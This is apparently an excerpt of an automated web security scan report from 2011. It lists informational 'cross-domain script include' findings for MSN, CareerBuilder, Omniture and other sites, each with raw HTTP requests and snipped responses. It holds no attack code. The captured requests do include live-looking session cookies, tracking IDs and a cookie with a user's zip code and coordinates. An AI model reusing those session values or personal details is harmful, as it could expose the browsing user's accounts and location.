Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:39:08 GMT
ntCoent-Length: 49661
Content-Length: 49661

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-msn.com/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://cpc.db3.s-msn.com/MSN/sc/js/38/8981e0642fa0b6ec71065801251bac.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

20.41. http://moxieinsight.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moxieinsight.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?xd_receiver=1 HTTP/1.1
Host: moxieinsight.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=2c9e5bbe7f56d18fa0b9532bc94c9016&extern=0&channel=http%3A%2F%2Fmoxieinsight.com%2F%3Fxd_receiver%3D1&locale=en_US
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6b3edcdb4805ead0868b6a622ed5ae73; __utmz=156098471.1303851459.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=156098471.878146381.1303851459.1303851459.1303851459.1; __utmc=156098471; __utmb=156098471.2.10.1303851459

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:07:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Content-Length: 324
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xd</title></head>
<body>
<script src="http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js" type="text/javascript"></script>
...[SNIP]...

20.42. http://moxieinsight.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moxieinsight.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: moxieinsight.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:03:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://moxieinsight.com/moxieinsight/xmlrpc.php
Link: <http://moxieinsight.com?p=5>; rel=shortlink
Set-Cookie: PHPSESSID=7723dec4a574188b7395e7c0bfa68dd2; path=/
Content-Length: 26203
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/" dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>Moxie Insight - Home<
...[SNIP]...
<link rel="pingback" href="http://moxieinsight.com/moxieinsight/xmlrpc.php" />

<script type="text/javascript" src="http://use.typekit.com/bpi7eqn.js"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js?ver=3.1'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
<script type='text/javascript' src='http://platform.twitter.com/anywhere.js?id=3VXxrl7e9B3f66ejq9xow&#038;v=1&#038;ver=1'></script>
...[SNIP]...
<!-- WordPress Title Case by Christopher Ross - http://thisismyurl.com --><script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

20.43. http://msn.careerbuilder.com/msn/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.careerbuilder.com
Path:   /msn/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /msn/default.aspx HTTP/1.1
Host: msn.careerbuilder.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CB%5FSID=66ee7709ffa3453389de6128eeb18875-357143948-w4-6; BID=X1B5CE6DB054A3B8D64198121F94D45E247F1DE3EBA3E204F258F8D2F5D9E98B1FB41E77395140550B900D87EFE23B4943

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR11
Date: Tue, 26 Apr 2011 18:39:20 GMT
Connection: close
Content-Length: 68353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Jobs &
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v12.51/Common/js/jquery/jquery-1.3.2.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v12.51/Common/js/jobseeker/ads/delayedad.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
...[SNIP]...
<!--[if !IE]>-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js">
</script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/voodoo/js/9/core.js "></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/2/report.js"></script>
<script type="text/javascript" src="http://ads1.msn.com/library/dap.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<img id="ctag" width="1" height="1" alt="" src="http://c.msn.com/c.gif?di=15128&amp;pi=7327&amp;ps=45019&amp;tp=http://specials.msn.com/mopsdk/standard/careers/msnshell.aspx&amp;rf=" />

<script type="text/javascript" src="http://hp.msn.com/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
<!-- End comScore Tag -->

<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/6/linktracking.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://blstj.msn.com/br/chan/om/js/s_code.2010.12.13.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/6/linktracking.js"></script>
...[SNIP]...

20.44. https://my.omniture.com/login/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.omniture.com
Path:   /login/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /login/ HTTP/1.1
Host: my.omniture.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; FLASH_ENABLED=yes; cms_site_lang=1; s_iid=1327; omniture_unique=112017266a99890bba572ea82148c69e; s_cc=true; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DTest%252526Target%2526pidt%253D1%2526oid%253Dhttp%25253A//www.omniture.com/offer/943%25253Fs_osc%25253D30199%2526ot%253DA; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1303601743323-887111.17#1306271419|check#true#1303852279|session#1303852218540-851916#1303854079

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:18:23 GMT
Server: Omniture AWS/2.0.0
xserver: www455
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 47239

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Adobe
...[SNIP]...
</script>
   <script charset="utf-8" src="https://www.omniture-static.com/js/ext/ext-base/ext-base-mbox38-proto1.7.0.0.js?l=en_US&version=-575236605"></script>
...[SNIP]...
<body id='bodyid' class="yui-skin-sam" >
<script type="text/javascript" charset="utf-8" src="https://www.omniture-static.com/js/ext/ext-base/opth.21.survey.js"></script>
...[SNIP]...

20.45. http://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /serve/fb/pdc?cat=&name=landing&sid=3306&browse_products=160547 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx?PromCode=645229L86530&PromType=internal
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303848180_12704:0_10164:104912_10638:104912_10640:104912_10641:104912_1437:104912_1660:668508; uid=1_1303848180_1303179323923:6792170478871670; kwd=1_1303848180_11317:104912_11717:104912_11718:104912_11719:104912; sit=1_1303848180_3306:0:0_719:105739:104912_2451:156608:151508_3236:314571:314453_782:668857:668508; cre=1_1303848180; bpd=1_1303848180; apd=1_1303848180; scg=1_1303848180; ppd=1_1303848180; afl=1_1303848180

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:03:22 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1303848202_15758:0_12704:0_12704:22_10164:104934_10638:104934_10640:104934_10641:104934_1437:104934_1660:668530; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:22 GMT; Path=/
Set-Cookie: uid=1_1303848202_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:22 GMT; Path=/
Set-Cookie: kwd=1_1303848202_11317:104934_11717:104934_11718:104934_11719:104934; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:22 GMT; Path=/
Set-Cookie: sit=1_1303848202_3306:22:0_719:105761:104934_2451:156630:151530_3236:314593:314475_782:668879:668530; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:22 GMT; Path=/
Set-Cookie: cre=1_1303848202; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:22 GMT; Path=/
Set-Cookie: bpd=1_1303848202_1ZCU5:0; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:22 GMT; Path=/
Set-Cookie: apd=1_1303848202; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:22 GMT; Path=/
Set-Cookie: scg=1_1303848202; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:22 GMT; Path=/
Set-Cookie: ppd=1_1303848202; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:22 GMT; Path=/
Set-Cookie: afl=1_1303848202; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:22 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 26 Apr 2011 20:03:22 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 742

<!-- campaign #12704 is eligible -->
<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(tim
...[SNIP]...
<img src="http://ads.exactdrive.com/seg?add=83633&t=2" width="1" height="1" />
<script src="http://ad.adtegrity.net/pixel?id=1236911&t=1" type="text/javascript"></script>
...[SNIP]...

20.46. http://realestate.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.msn.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: realestate.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:38:59 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA16
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 43394
Content-Length: 43394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

20.47. http://realestate.msn.com/article.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.msn.com
Path:   /article.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /article.aspx?cp-documentid=28280145 HTTP/1.1
Host: realestate.msn.com
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; DSurv=false; s_cc=true; s_sq=%5B%5BB%5D%5D; Sample=37

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:45:13 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA13
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 91100
Content-Length: 91100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://realestate.msn.us.intellitxt.com/ast/js/msn/realestate.msn_cs.js"></script>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...

20.48. http://seclists.org/fulldisclosure/2011/Apr/388  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seclists.org
Path:   /fulldisclosure/2011/Apr/388

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /fulldisclosure/2011/Apr/388 HTTP/1.1
Host: seclists.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:51:09 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 26 Apr 2011 21:30:08 GMT
ETag: "208d97-4430-4a1d907391800"
Accept-Ranges: bytes
Content-Length: 17456
Content-Type: text/html; charset=UTF-8

<!-- MHonArc v2.6.16 -->
<!--X-Head-End-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<link rel="alt
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=top-search-box&amp;lang=en"></script>
...[SNIP]...

20.49. https://secure.bundle.com/Membership/LogOn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.bundle.com
Path:   /Membership/LogOn

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Membership/LogOn?returnurl=%2Fmsn%2FLoggedIn HTTP/1.1
Host: secure.bundle.com
Connection: keep-alive
Referer: https://secure.bundle.com/msn
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1303843206.1.1.utmcsr=money.msn.com|utmccn=(referral)|utmcmd=referral|utmcct=/taxes/; __utma=1.2122043951.1303843206.1303843206.1303843206.1; __utmc=1; __utmb=1.2.10.1303843206; SESSIONID=h50b1r45qzwyxs34b22hzjzc; rfr=none%7CBundle%3A%20The%20No.%201%20Source%20for%20How%20People%20Spend%20and%20Save%20Money%20--%20Personal%20Finance%20Data%2C%20Money%20Advice%2C%20Trends%2C%20News%20and%20Community%3A%20https%3A%2F%2Fsecure.bundle.com%2Fmsn

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Bundle-Server: prod-app01
X-Bundle-Server: prod-web05
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 18:45:33 GMT
Connection: keep-alive
Set-Cookie: __RequestVerificationToken_Lw__=HnsJb5DxR3JsrwADkF6kOt9xVMG7yhpZzwkhG1bAranocdXh1p+yqmWZxRuF9mgi; path=/; HttpOnly
Cache-Control: private, no-store, max-age=0
Cache-Control: private, no-store, max-age=0
Expires: Tue, 26 Apr 2011 18:45:40 GMT
Expires: Tue, 26 Apr 2011 18:45:40 GMT
Content-Length: 14062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...
<div class="logon-verisign">
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=secure.bundle.com&amp;size=L&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
...[SNIP]...

20.50. https://secure.bundle.com/msn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.bundle.com
Path:   /msn

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /msn HTTP/1.1
Host: secure.bundle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Bundle-Server: prod-app01
X-Bundle-Server: prod-web05
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 18:41:04 GMT
Connection: keep-alive
Cache-Control: private, no-store, max-age=0
Cache-Control: private, no-store, max-age=0
Expires: Mon, 25 Apr 2011 23:33:16 GMT
Expires: Mon, 25 Apr 2011 23:33:16 GMT
Content-Length: 29943


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<![endif]-->
       <script type="text/javascript" src="https://secure.footprint.net/bstmsn/br/sc/js/jquery/jquery-1.4.2.min.js"></script>
...[SNIP]...

20.51. http://social.msn.com/boards/RequestBridge.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.msn.com
Path:   /boards/RequestBridge.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /boards/RequestBridge.aspx HTTP/1.1
Host: social.msn.com
Proxy-Connection: keep-alive
Referer: http://money.msn.com/tax-tips/post.aspx?post=8fa91862-f906-481d-8eae-2c7e1758d57c
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; s_cc=true; s_sq=%5B%5BB%5D%5D; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 18:45:35 GMT
Content-Length: 1820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Request Bridge</title>
<script type="text/javascript" src="http://blu.stj.s-msn.com/br/scp/js/bb381e2d19d8eace86b34d20759491a5/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="http://blu.stj.s-msn.com/br/scp/js/7c9d3a8fa4e702e6c550208c65020f8e/json2.js"></script>
...[SNIP]...

20.52. http://theinvestedlife.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://theinvestedlife.msn.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?source=msnmoney HTTP/1.1
Host: theinvestedlife.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=290
Content-Length: 29567
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 18:43:58 GMT
Last-Modified: Tue, 26 Apr 2011 18:28:58 GMT
Server: Microsoft-IIS/7.5
Vary: *
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:39:08 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/">
...[SNIP]...
<div id="wrapperTracking"><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d743529/2/743550/randm.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d743529/3/743551/randm.js"></script><script type="text/javascript" src="http://analytics.live.com/Analytics/wlAnalytics.js"></script>
...[SNIP]...

20.53. http://us.social.s-msn.com/s/js/16/ue.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.social.s-msn.com
Path:   /s/js/16/ue.min.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /s/js/16/ue.min.js HTTP/1.1
Host: us.social.s-msn.com
Proxy-Connection: keep-alive
Referer: http://money.msn.com/market-news/default.aspx?feat=2f32cfe1-809c-4c94-91ed-3e58746880aa
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Accept-Ranges: bytes
ETag: "06de4c0defcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
Content-Length: 136116
Age: 11427
Date: Tue, 26 Apr 2011 18:35:58 GMT
Last-Modified: Wed, 30 Mar 2011 19:07:46 GMT
Connection: keep-alive

